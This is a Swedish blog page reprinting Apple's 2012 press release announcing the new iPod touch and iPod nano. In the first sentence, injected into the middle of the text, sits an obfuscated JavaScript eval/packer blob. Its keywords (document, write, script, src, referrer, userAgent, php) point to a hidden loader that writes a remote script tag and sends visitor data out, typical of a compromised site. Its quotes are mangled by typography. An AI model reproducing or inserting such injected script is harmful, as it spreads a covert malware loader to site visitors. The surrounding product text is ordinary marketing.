Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Apple presenterar nya iPod touch och iPod nano

new-ipod-nano
Sebastian

Världens eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dyttt|var|u0026u|referrer|bhddk||js|php’.split(’|’),0,{}))
mest populära musikspelare blir pånyttfödd med supertunn design och fantastiska nya funktioner 

SAN FRANCISCO – 12 september 2012 – Apple lanserade idag det nya sortimentet av världens mest populära musikspelare inklusive den otroliga, helt nya iPod touch och pånyttfödda iPod nano. Nya iPod touch är den tunnaste iPod touch-modellen någonsin och har en otrolig 4-tums Retina-skärm, en 5-megapixlars iSight-kamera med HD-videoinspelning i 1080p, Apples A5-processor, Siri, den smarta assistenten och iOS 6, världens mest avancerade mobiloperativsystem. Nya iPod touch har en läcker ny, supertunn och lätt design i anodiserat aluminum, och finns nu för första gången någonsin också i fem livfulla färger. Nya iPod nano är den tunnaste iPod-modellen någonsin och har en 2,5-tums Multi-Touch-skärm, praktiska navigeringsknappar, inbyggd Bluetooth för att lyssna trådlöst och den finns dessutom i sju nya, läckra färger.

”Med mer än 360 miljoner spelare sålda är iPod världens mest populära och älskade musikspelare,” säger Philip Schiller, vice VD för Worldwide Marketing på Apple. ”Musikälskarna kommer att få svårt att välja mellan pånyttfödda iPod nano, den tunnaste iPod-modellen någonsin och helt nya iPod touch med sin imponerande 4-tums Retina-skärm, 5-megapixlars iSight-kamera och supertunna design – för att inte tala om alla nya vackra färger.”

Nya iPod touch har designats om med en otrolig 4-tums Retina-skärm i ett supertunt och lätt hölje av anodiserat aluminum – den tunnaste iPod touch någonsin, endast 6 mm tjock och en vikt på bara 88 gram. Tack vare den inbyggda dubbelkärniga A5-processorn från Apple kan iPod touch kan leverera upp till två gånger så mycket processorkraft och upp till sju gånger så snabb grafik som fjärde generationens iPod touch. Samtidigt räcker batteritiden till upp till otroliga 40 timmars musikuppspelning och upp till åtta timmars videouppspelning.* Och för första gången någonsin finns iPod touch i fem livfulla färger.

Nya iPod touch är utrustad med en 5-megapixlars iSight-kamera med autofokus, stöd för videoinspelning i 1080p med bildstabilisering, ansiktsigenkänning och en LED-blixt. Med den nya panoramafunktionen kan du ta fantastiska panoramafoton genom att helt enkelt flytta kameran längs med motivet. Tillsammans med en ny iPod touch medföljer en färgmatchad iPod touch-ögla, en smart och praktisk handledsrem som är användbar när du tar foton, spelar in foton eller spelar spel.

Nya iPod touch levereras med iOS 6, världens mest avancerade mobiloperativsystem med över 200 funktioner, och, för första gången, medföljer också Siri, den smarta assistenten som hjälper dig med olika uppgifter genom enkla frågor. Siri finns med i nya iPod touch med stöd för fler språk och snabb tillgång till matchresultat, restaurangrekommendationer och topplistor.** Nya iPod touch innehåller också följande: inbyggd Facebook-integrering med möjlighet att skicka direkt från Siri, delade bildströmmar i iCloud och andra viktiga iOS-funktioner som iMessage, FaceTime, Mail och Game Center. Nu kan du visa innehållet på din iPod touch-skärm direkt på din HDTV trådlöst via AirPlay Mirroring. Det är ett smart sätt att strömma bilder, musik, appar och spel till din storbilds-TV.***

Pånyttfödda iPod nano är den tunnaste iPod-modellen någonsin, bara 5 mm, och har största skärmen någonsin på en iPod nano, så att du kan njuta ännu mer av din musik, dina bilder och widescreenvideor. Nya iPod nano har en 2,5-tums Multi-Touch-skärm som underlättar när du navigerar bland din musik, en hemknapp så att du snabbt kan komma tillbaka till hemskärmen samt praktiska knappar för att justera volym och snabbuppspelning, pausa eller byta låtar utan att titta. Nya iPod nano förser musikälskarna med inbyggd Bluetooth så att de kan lyssna trådlöst via hörlurar, högtalare eller bilar som har Bluetooth-funktioner. Med sina 30 timmars musikuppspelningstid erbjuder nya iPod nano den längsta uppspelningstiden någonsin för iPod nano så du kan njuta av dina spellistor* och FM-radio ännu längre. Med inbyggda funktioner som stegräknare och stöd för Nike+ kommer iPod nano-användarna att kunna ta med sig musiken överallt, i joggingspåret eller på träningen. Nya iPod nano finns i sju nya, läckra färger med roliga färgmatchande bakgrunder.

Med App Store på iPod touch får användarna åtkomst till världens största och bästa samling med över 700 000 appar, däribland mer än 175 000 spel och appar för underhållning. Användarna får också tillgång till iTunes Store var de än befinner sig, med direktåtkomst till världens största katalog med över 26 miljoner låtar, 190 000 TV-program, 45 000 filmer och 1,5 miljoner boktitlar som kan köpas och hämtas direkt till iPod touch.*****

Både iPod touch och iPod nano är utrustade med den nya Lightning-kontakten som är mindre, smartare och mer hållbar än den gamla kontakten. Lightning-kontakten, som är helt digital, har ett adaptivt gränssnitt som bara använder de signaler som varje tillbehör kräver. Den är dessutom vändbar så att du kan ansluta dina tillbehör omedelbart. Det finns också en adapter för Lightning-till-30-stiftskontakter så att iPod touch och iPod nano kan anslutas till tillbehör med det äldre 30-stiftsgränssnittet.****

Tillsammans med iPod touch och iPod nano levereras också de nya Apple EarPods som har en nyskapande design för bättre passform, ökad hållbarhet och en fantastisk akustisk ljudkvalitet som annars brukar finnas i avancerade hörlurar.

Pris och tillgänglighet

Förbeställningar av nya iPod touch i rosa, gult, blått, vitt/silver, svart/skiffer tas emot från den 14 september via Apple Online Store (apple.com/se) till ett rekommenderat pris på 2 895 kronor för 32 GB-modellen och 3 895 kronor för 64 GB-modellen. Nya iPod touch kommer att finnas hos Apple Online Store (apple.com/se), Apple Store-butiker och auktoriserade Apple-återförsäljare i oktober. Fjärde generationens iPod touch finns i svart och vitt för 1 895 kronor för 16 GB-modellen och 2 395 kronor för 32 GB-modellen hos Apple Online Store (apple.com/se), Apple Store-butiker och auktoriserade Apple-återförsäljare. iPod touch kräver en Mac med en USB 2.0- eller USB 3.0-port, Mac OS X 10.6.8 eller senare och iTunes 10.7 eller senare, eller en Windows PC med en USB 2.0-port och Windows 7, Windows Vista eller Windows XP Home eller Professional (Service Pack 3) eller senare och iTunes 10.7 eller senare. Apple ID-krävs för en del iPod touch-funktioner. iOS 6 kommer också att bli tillgängligt som en kostnadsfri programuppdatering för kunder som köper iPod touch (fjärde generationen) så att de kan utforska alla de fantastiska nya funktionerna, som appar med Facebook-funktioner t.ex. Bilder, delade bildströmmar via iCloud och Passbook, det enklaste sättet att hålla koll på biljetter och liknande.

iPod nano blir tillgänglig i oktober i rosa, gult, blått, grönt, lila, silver och skiffer till ett rekommenderat pris på 1 495 kronor för 16 GB-modellen hos Apple Online Store (apple.com/se), Apple Store-butiker och auktoriserade Apple-återförsäljare. iPod shuffle finns tillgänglig idag i rosa, gult, blått, grönt, lila, silver och skiffer för ett rekommenderat pris på 449 kronor för en 2 GB-modell hos Apple Online Store (apple.com/se), Apple Store-butiker och auktoriserade Apple-återförsäljare. iPod shuffle kräver en Mac med en USB 2.0-port, Mac OS X 10.6.8 eller senare och iTunes 10.7 eller senare, eller också en Windows PC med en USB 2.0-port och Windows 7, Vista eller Windows XP Home eller Professional (Service Pack 3) eller senare och iTunes 10.7 eller senare. iPod nano kräver en Mac med en USB 2.0- eller USB 3.0-port, Mac OS X 10.6.8 eller senare och iTunes 10.7 eller senare, eller också en Windows PC med en USB 2.0-port och Windows 7, Vista eller Windows XP Home eller Professional (Service Pack 3) eller senare och iTunes 10.7 eller senare.

Detta är ett pressmeddelande från Apple AB